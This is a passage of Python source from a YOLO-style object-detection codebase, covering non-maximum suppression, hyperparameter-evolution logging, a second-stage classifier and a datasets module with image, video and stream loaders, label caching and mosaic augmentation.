x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
else:
kpts = x[:, 6:]
conf, j = x[:, 5:6].max(1, keepdim=True)
x = torch.cat((box, conf, j.float(), kpts), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def print_mutation(hyp, results, yaml_file='hyp_evolved.yaml', bucket=''):
# Print mutation results to evolve.txt (for use with train.py --evolve)
a = '%10s' * len(hyp) % tuple(hyp.keys()) # hyperparam keys
b = '%10.3g' * len(hyp) % tuple(hyp.values()) # hyperparam values
c = '%10.4g' * len(results) % results # results (P, R, [email protected], [email protected]:0.95, val_losses x 3)
print('\n%s\n%s\nEvolved fitness: %s\n' % (a, b, c))
if bucket:
url = 'gs://%s/evolve.txt' % bucket
if gsutil_getsize(url) > (os.path.getsize('evolve.txt') if os.path.exists('evolve.txt') else 0):
os.system('gsutil cp %s .' % url) # download evolve.txt if larger than local
with open('evolve.txt', 'a') as f: # append result
f.write(c + b + '\n')
x = np.unique(np.loadtxt('evolve.txt', ndmin=2), axis=0) # load unique rows
x = x[np.argsort(-fitness(x))] # sort
np.savetxt('evolve.txt', x, '%10.3g') # save sort by fitness
# Save yaml
for i, k in enumerate(hyp.keys()):
hyp[k] = float(x[0, i + 7])
with open(yaml_file, 'w') as f:
results = tuple(x[0, :7])
c = '%10.4g' * len(results) % results # results (P, R, [email protected], [email protected]:0.95, val_losses x 3)
f.write('# Hyperparameter Evolution Results\n# Generations: %g\n# Metrics: ' % len(x) + c + '\n\n')
yaml.dump(hyp, f, sort_keys=False)
if bucket:
os.system('gsutil cp evolve.txt %s gs://%s' % (yaml_file, bucket)) # upload
def apply_classifier(x, model, img, im0):
# applies a second stage classifier to yolo outputs
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for j, a in enumerate(d): # per item
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
# cv2.imwrite('test%i.jpg' % j, cutout)
                im = im[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x224x224
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255.0 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
# datasets.py (from repo TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT, GPL-3.0)
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
import pickle
from copy import deepcopy
#from pycocotools import mask as maskUtils
from torchvision.utils import save_image
from torchvision.ops import roi_pool, roi_align, ps_roi_pool, ps_roi_align
from general import check_requirements, xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, \
resample_segments, clean_str
from ultralytics.utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
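# Usage sketch (illustrative, not part of the original file): the training script would
# typically call this once per split; `train_path`, `opt` (with opt.single_cls) and `hyp`
# are assumed to come from its argument parser and hyperparameter YAML:
#   dataloader, dataset = create_dataloader(train_path, 640, 16, 32, opt, hyp=hyp,
#                                           augment=True, rect=False, rank=-1,
#                                           world_size=1, workers=8, prefix='train: ')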
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
#print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
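# Usage sketch (illustrative, not part of the original file): LoadImages is the
# single-source inference loader; it yields letterboxed CHW RGB uint8 arrays, so a
# typical consumer converts to a normalized torch batch ('inference/images' is a placeholder):
#   dataset = LoadImages('inference/images', img_size=640, stride=32)
#   for path, img, im0, vid_cap in dataset:
#       img = torch.from_numpy(img).float() / 255.0  # uint8 0-255 -> float 0.0-1.0
#       if img.ndimension() == 3:
#           img = img.unsqueeze(0)                   # add batch dimension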
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:[email protected]/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
url = eval(s) if s.isnumeric() else s
if 'youtube.com/' in str(url) or 'youtu.be/' in str(url): # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
url = pafy.new(url).getbest(preftype="mp4").url
cap = cv2.VideoCapture(url)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {self.fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(1 / self.fps) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
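# Usage sketch (illustrative, not part of the original file): labels are expected to
# mirror the image tree with 'images' swapped for 'labels' and a .txt suffix
# (POSIX-style path shown):
#   img2label_paths(['coco/images/train2017/000000000009.jpg'])
#   # -> ['coco/labels/train2017/000000000009.txt']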
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
#self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
#if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
# cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
if random.random() < 0.8:
img, labels = load_mosaic(self, index)
else:
img, labels = load_mosaic9(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
if random.random() < 0.8:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
else:
img2, labels2 = load_mosaic9(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
#img, labels = self.albumentations(img, labels)
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
if random.random() < hyp['paste_in']:
sample_labels, sample_images, sample_masks = [], [], []
while len(sample_labels) < 30:
sample_labels_, sample_images_, sample_masks_ = load_samples(self, random.randint(0, len(self.labels) - 1))
sample_labels += sample_labels_
sample_images += sample_images_
sample_masks += sample_masks_
#print(len(sample_labels))
if len(sample_labels) == 0:
break
labels = pastein(img, labels, sample_labels, sample_images, sample_masks)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
#img4, labels4, segments4 = remove_background(img4, labels4, segments4)
#sample_segments(img4, labels4, segments4, probability=self.hyp['copy_paste'])
